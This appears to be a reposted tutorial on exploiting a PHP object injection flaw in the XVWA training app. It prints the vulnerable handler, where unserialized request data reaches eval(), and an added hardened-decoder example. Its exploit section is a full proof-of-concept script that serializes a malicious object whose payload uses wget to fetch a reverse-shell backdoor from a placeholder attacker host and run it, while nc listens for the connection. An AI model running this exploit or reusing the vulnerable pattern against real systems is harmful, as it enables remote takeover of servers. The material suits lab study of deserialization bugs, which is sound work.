PHP serialization/object Injection Vulnerability

Source: Internet
Author: User

This article is a short walkthrough of PHP serialization/object injection vulnerability analysis, and it describes how such a flaw leads to a remote shell on the host. If you want to test this vulnerability yourself, you can use XVWA or Kevgir. The first step of exploitation is to test whether PHP serialization is used by the target application. To assist with this test we use the Burp Suite SuperSerial plug-in, which passively detects the use of PHP and Java serialization.
Analysis
We have detected that PHP serialization is used in the application, so we can start checking whether the application code contains a remote code execution vulnerability. Note that the serialized object is taken from the request parameter r:

    $var1 = unserialize($_REQUEST['r']);

During deserialization the __wakeup() method of the rebuilt object runs, and it passes the object's inject property to eval():

    eval($this->inject);

Finally, the handler echoes the result:

    echo "".$var1[0]." - ".$var1[1];

So if we supply a crafted serialized PHPObjectInjection object in parameter r instead of the expected array, we get code execution!
The vulnerable XVWA handler in full:

    <?php
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }

    // ?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
    if(isset($_REQUEST['r'])){
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){
            echo "".$var1[0]." - ".$var1[1];
        }
    }else{
        echo "parameter is missing";
    }
    ?>
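The following is an added example, not code from the original article or from XVWA: the page's handler is decoded two ways, as written and hardened with unserialize()'s allowed_classes option (PHP 7.0 and later) plus a check that the result has the shape the handler actually expects. The class keeps the page's name and property; the function and variable names, and the probe input, are assumptions for this example.

```php
<?php
// Added example, not the article's or XVWA's code: the page's handler decoded
// two ways. Names other than PHPObjectInjection and $inject are assumed here.
class PHPObjectInjection {
    public $inject;
    function __wakeup() {
        if (isset($this->inject)) {
            eval($this->inject);      // the sink: request data reaches eval()
        }
    }
}

// Vulnerable: plain unserialize() honours "O:" records, so an object of any
// loaded class is rebuilt from the request and its __wakeup() runs.
function decode_vulnerable(string $r) {
    return unserialize($r);
}

// Hardened (PHP >= 7.0): allowed_classes => false turns every object record
// into __PHP_Incomplete_Class, so no application __wakeup()/__destruct() runs.
// The handler only ever needed two strings, so the result is also checked
// for exactly that shape and anything else is refused.
function decode_hardened(string $r) {
    $value = @unserialize($r, ['allowed_classes' => false]);
    if (!is_array($value) || count($value) !== 2) {
        return null;
    }
    foreach ($value as $item) {
        if (!is_string($item)) {      // nested object or array: refuse
            return null;
        }
    }
    return array_values($value);
}

// Constructed inputs: the benign array from the page's comment, and an object
// record whose inject body only sets a flag, so the effect is observable.
$benign = 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}';
$probe  = 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:24:"$GLOBALS[\'wakeup\']=true;";}';

$GLOBALS['wakeup'] = false;
decode_vulnerable($probe);
$ranVulnerable = $GLOBALS['wakeup'];     // __wakeup() evaluated the inject body
$GLOBALS['wakeup'] = false;
$hardened = decode_hardened($probe);     // the object record is refused
$ranHardened = $GLOBALS['wakeup'];       // no __wakeup() was invoked
printf("vulnerable decoder ran __wakeup(): %s\n", var_export($ranVulnerable, true));
printf("hardened decoder ran __wakeup():   %s\n", var_export($ranHardened, true));
print_r(decode_hardened($benign));       // the two strings the handler expects
```

If the data does not need to carry objects at all, json_decode() on a JSON-encoded value is the simpler replacement, since it never instantiates application classes.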

Vulnerability Exploitation
To exploit this vulnerability, we created a simple PHP script that automatically generates the PHP serialization payload and runs the command we want on the remote target host. It uses the general-purpose PHP reverse shell from pentestmonkey:
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: you need to upload this file to a web server you control, set your local IP address and port in the reverse shell script, and then use the following code:
    <?php
    /*
    PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
    A simple PoC to exploit PHP Object Injection flaws and gain remote shell access.
    Shouts to @jstnkndy @yappare for the assist!
    NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
    setup on a remote host with a connect back IP configured
    */
    print "==============================================================================\r\n";
    print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
    print "==============================================================================\r\n";
    print "[+] Generating serialized payload...[OK]\r\n";
    print "[+] Launching reverse listener...[OK]\r\n";
    system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

    class PHPObjectInjection{
        // CHANGE URL/FILENAME TO MATCH YOUR SETUP
        public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
    }

    $url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
    $url = $url . urlencode(serialize(new PHPObjectInjection));
    print "[+] Sending exploit...[OK]\r\n";
    print "[+] Dropping down to interactive shell...[OK]\r\n";
    print "==============================================================================\r\n";
    $response = file_get_contents("$url");
    ?>

Demo

Now that our script is ready, we can execute it to obtain a reverse shell on the remote host and run commands on it.